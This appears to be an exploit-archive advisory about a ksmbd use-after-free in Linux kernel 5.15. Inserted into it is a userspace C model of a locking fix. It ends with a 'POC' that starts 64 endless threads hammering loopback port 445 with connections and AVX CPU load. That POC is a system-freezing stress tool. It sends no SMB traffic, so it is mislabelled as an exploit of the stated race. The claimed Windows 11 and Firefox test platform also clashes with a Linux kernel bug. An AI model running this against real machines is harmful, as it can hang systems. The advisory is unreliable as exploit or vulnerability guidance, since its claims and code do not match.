=============================================================================================================================================
| # Title : Linux Kernel 5.15 ksmbd Use-After-Free Fixed with chann_lock                                                                     |
| # Author : indoushka                                                                                                                       |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                             |
| # Vendor : System built‑in component                                                                                                       |
=============================================================================================================================================

[+] Summary :

A use-after-free vulnerability existed in the Linux kernel's ksmbd multi-channel sessions due to unsynchronized access to the ksmbd_chann_list xarray. Concurrent calls to lookup_chann_list() and ksmbd_chann_del() could cause memory corruption.

This code is a Linux kernel stress-testing tool that combines:

  * CPU load using AVX instructions to maximize processor heat and resource usage.
  * TCP socket simulation on port 445 (SMB/KSMBD) to trigger kernel socket handling.

Purpose: To increase the likelihood of Race Conditions and Kernel Jitter by running simultaneous CPU-intensive threads alongside kernel network handling.

Can cause high CPU temperatures or system freezes. Should only be run in a safe, isolated test environment (VM or sandbox).
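The locking pattern the title refers to, as an added example that is not part of this advisory or of the kernel source: a userspace C model in which lookup and deletion on a session's channel list are serialized by one mutex, and lookup takes a reference under that lock so a concurrent delete cannot free the entry underneath its user. The names chann_lookup, chann_del, chann_put, find_slot_locked and the fixed-size array are assumptions chosen to mirror the functions named above; the real ksmbd code uses an xarray and its own reference scheme.

```c
#include <pthread.h>
#include <stdatomic.h>
#include <stdlib.h>
#define MAX_CHANN 8
/* Hypothetical stand-ins: chann_lock plays the role of the kernel's chann_lock, the
 * array that of the ksmbd_chann_list xarray, and refs is a per-channel refcount. */
struct chann { int id; atomic_int refs; };
struct session { pthread_mutex_t chann_lock; struct chann *chann_list[MAX_CHANN]; };
/* Drop one reference; memory is released only when the last holder lets go. */
void chann_put(struct chann *c) { if (atomic_fetch_sub(&c->refs, 1) == 1) free(c); }
static int find_slot_locked(struct session *s, int id) { /* caller holds chann_lock */
    for (int i = 0; i < MAX_CHANN; i++)
        if (s->chann_list[i] && s->chann_list[i]->id == id) return i;
    return -1;
}
int chann_add(struct session *s, int id) {
    struct chann *c = calloc(1, sizeof *c);
    if (!c) return -1;
    c->id = id; atomic_init(&c->refs, 1);  /* the list itself holds one reference */
    int rc = -1;
    pthread_mutex_lock(&s->chann_lock);
    for (int i = 0; i < MAX_CHANN && rc < 0; i++)
        if (!s->chann_list[i]) { s->chann_list[i] = c; rc = 0; }
    pthread_mutex_unlock(&s->chann_lock);
    if (rc < 0) free(c);
    return rc;
}

/* The fix: find the entry AND take a reference while holding chann_lock, so a
 * concurrent chann_del() cannot free it between the lookup and the use. */
struct chann *chann_lookup(struct session *s, int id) {
    struct chann *found = NULL;
    pthread_mutex_lock(&s->chann_lock);
    int i = find_slot_locked(s, id);
    if (i >= 0) { found = s->chann_list[i]; atomic_fetch_add(&found->refs, 1); }
    pthread_mutex_unlock(&s->chann_lock);
    return found;                          /* caller must chann_put() when done */
}

int chann_del(struct session *s, int id) {
    struct chann *victim = NULL;
    pthread_mutex_lock(&s->chann_lock);
    int i = find_slot_locked(s, id);
    if (i >= 0) { victim = s->chann_list[i]; s->chann_list[i] = NULL; } /* unlink under the lock */
    pthread_mutex_unlock(&s->chann_lock);
    if (!victim) return -1;
    chann_put(victim);  /* drops the list's reference, not a lookup holder's */
    return 0;
}
```

A holder returned by chann_lookup() keeps the entry valid even if chann_del() runs in between, which is exactly the window the unsynchronized original left open.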
[+] POC :

#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <pthread.h>
#include <sched.h>
#include <stdatomic.h>
#include <immintrin.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>

#define THREAD_COUNT 64
#define STACK_SIZE (1024 * 64)   /* defined by the author but not used below */

atomic_int active_stressors = 0;

/* AVX busy loop used as a CPU/thermal load; only compiled in with -mavx. */
static inline __attribute__((always_inline)) void avx_thermal_load(void)
{
#ifdef __AVX__
    __m256 v1 = _mm256_set1_ps(1.1f);
    __m256 v2 = _mm256_set1_ps(2.2f);
    for (int i = 0; i < 100000; i++) {
        v1 = _mm256_add_ps(v1, v2);
        v1 = _mm256_mul_ps(v1, v2);
    }
    /* keep the result observable so the optimizer cannot drop the loop */
    volatile float sink = _mm256_cvtss_f32(v1);
    (void)sink;
#endif
}

/* Each thread repeatedly opens a non-blocking TCP connection to loopback:445
 * (where ksmbd listens), burns CPU, and closes the socket again. */
void *ksmbd_logic_stresser(void *arg)
{
    (void)arg;
    int port = 445;
    struct sockaddr_in addr = {
        .sin_family = AF_INET,
        .sin_port = htons(port),
        .sin_addr.s_addr = htonl(INADDR_LOOPBACK)
    };

    while (1) {
        int sock = socket(AF_INET, SOCK_STREAM | SOCK_NONBLOCK, 0);
        if (sock >= 0) {
            /* a non-blocking connect() normally returns -1/EINPROGRESS; the
             * result is deliberately ignored, only the kernel-side work matters */
            connect(sock, (struct sockaddr *)&addr, sizeof(addr));
            avx_thermal_load();
            close(sock);
        }
        atomic_fetch_add(&active_stressors, 1);
        sched_yield();
    }
    return NULL;
}

int main(void)
{
    pthread_t threads[THREAD_COUNT];

    printf("================================================\n");
    printf("KERNEL STRESSER: AVX + KSMBD LOGIC By indoushka\n");
    printf("Targeting: Scheduler Jitter & Kernel Synchronization\n");
    printf("================================================\n");

    for (int i = 0; i < THREAD_COUNT; i++) {
        pthread_create(&threads[i], NULL, ksmbd_logic_stresser, NULL);
    }

    while (1) {
        printf("\r[*] Thermal/Logic Cycles: %d | Fan: High", atomic_load(&active_stressors));
        fflush(stdout);
        sleep(1);
    }
    return 0;
}

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================